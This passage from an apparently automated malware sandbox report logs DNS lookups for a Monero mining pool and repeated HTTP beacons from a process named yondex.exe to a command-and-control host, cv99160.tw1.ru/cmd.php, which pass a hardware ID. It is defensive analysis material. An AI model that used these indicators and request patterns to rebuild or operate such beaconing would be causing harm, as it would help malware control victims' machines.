Jun 23, 2024 11:31:12.209815979 CEST  1.1.1.1      192.168.2.4  0x5123    No error (0)  pool.supportxmr.com     pool-fr.supportxmr.com                 CNAME (Canonical name)  IN (0x0001)  false
Jun 23, 2024 11:31:12.209815979 CEST  1.1.1.1      192.168.2.4  0x5123    No error (0)  pool-fr.supportxmr.com                          141.94.96.144  A (IP address)          IN (0x0001)  false
Jun 23, 2024 11:31:12.209815979 CEST  1.1.1.1      192.168.2.4  0x5123    No error (0)  pool-fr.supportxmr.com                          141.94.96.195  A (IP address)          IN (0x0001)  false
Jun 23, 2024 11:31:12.209815979 CEST  1.1.1.1      192.168.2.4  0x5123    No error (0)  pool-fr.supportxmr.com                          141.94.96.71   A (IP address)          IN (0x0001)  false
• cv99160.tw1.ru

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49731        92.53.96.121    443               6936  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe

Timestamp                Bytes transferred  Direction  Data
2024-06-23 09:31:11 UTC  172                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:31:12 UTC  357                IN         HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:31:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=9972c2334554062f25a153e736384962; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49733        92.53.96.121    443               6936  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe

Timestamp                Bytes transferred  Direction  Data
2024-06-23 09:31:13 UTC  144                OUT        GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:31:13 UTC  357                IN         HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:31:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=5dfd13a2fbd8200ac0b97f259e04310b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:31:13 UTC  1                  IN         Data Raw: 31
Data Ascii: 1


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49734        92.53.96.121    443               6936  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe

Timestamp                Bytes transferred  Direction  Data
2024-06-23 09:31:14 UTC  148                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:31:14 UTC  357                IN         HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:31:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=fde6ef62d90f48fdf15ee313d769bdd0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49735        92.53.96.121    443               6936  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe

Timestamp                Bytes transferred  Direction  Data
2024-06-23 09:31:15 UTC  144                OUT        GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:31:15 UTC  357                IN         HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:31:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=abddcc20d6662c2ece556dc338a4b9f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:31:15 UTC  1                  IN         Data Raw: 31
Data Ascii: 1


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49737        92.53.96.121    443               7568  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe

Timestamp                Bytes transferred  Direction  Data
2024-06-23 09:31:21 UTC  172                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:31:21 UTC  357                IN         HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:31:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=87434c3954741ad76adc40e29ba1d45e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.44973892.53.96.1214437568C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:22 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:22 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d33c6c0872914df4e0491810bbee114d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:22 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.2.4 | 49739 | 92.53.96.121 | 443 | 7568 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:23 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:23 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=de602d527296c699148e20cb557fb82f; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              7 | 192.168.2.4 | 49741 | 92.53.96.121 | 443 | 7568 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:24 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:25 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1c19c175874b76d1a6a52b596cdd9278; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:25 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              8 | 192.168.2.4 | 49742 | 92.53.96.121 | 443 | 7568 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:25 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:26 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=778cf168785064e553e1193d53a50070; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              9 | 192.168.2.4 | 49744 | 92.53.96.121 | 443 | 7568 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:27 UTC | 168 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:27 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e6158b8c5b10ecae63292e9c54b7694d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:27 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              10 | 192.168.2.4 | 49749 | 92.53.96.121 | 443 | 7864 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:33 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:33 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=cb6c50cb5830cd0f5d9513dc1500b7e8; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              11 | 192.168.2.4 | 49750 | 92.53.96.121 | 443 | 7864 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:34 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:34 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=bb8981b999369c0639d06b6e13a823e4; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:34 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              12 | 192.168.2.4 | 49751 | 92.53.96.121 | 443 | 7864 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:35 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:35 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9f86a2418592531e6d7043c5087f4e7e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              13 | 192.168.2.4 | 49752 | 92.53.96.121 | 443 | 7864 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:36 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:36 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=81dfcf86240e6ca062b82884b38c9d0c; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:36 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              14 | 192.168.2.4 | 49753 | 92.53.96.121 | 443 | 7864 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:37 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:38 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d6c522932764ed2efad9e948a1532833; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              15 | 192.168.2.4 | 49755 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:44 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:44 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=7742708f929fc95c30887176d368f4ef; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              16 | 192.168.2.4 | 49756 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:45 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:45 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9b430adee248e7127b8d2d074aa89491; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:45 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              17 | 192.168.2.4 | 49757 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:46 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:47 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8d0d6877c4dd8b62bf2c0b84164d63c0; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              18 | 192.168.2.4 | 49758 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:48 UTC | 168 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:48 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=725865cc4b1d781343cfab94871c4564; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:48 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              19 | 192.168.2.4 | 49759 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:49 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:49 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ba11adf49876910b7d9b54aa916bdc77; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              20 | 192.168.2.4 | 49760 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:50 UTC | 168 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:50 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0efa7b9711a6b453b4cab730f7dbfa6a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:50 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              21 | 192.168.2.4 | 49761 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:51 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:51 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c5af589d184bf6c6ee88b6ea7b13590d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              22 | 192.168.2.4 | 49762 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:52 UTC | 168 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:53 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d4b72a0e747e64b9fda7a8f2a161bf03; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:53 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              23 | 192.168.2.4 | 49763 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:53 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:54 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ce837ff9705006dd6426b96a52834a54; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              24 | 192.168.2.4 | 49764 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:54 UTC | 168 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:55 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=a9dff7b54bbca3d2b214932852b1a6e1; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:55 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              25 | 192.168.2.4 | 49765 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:56 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:56 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=58085a72110a473141e826763113d59b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
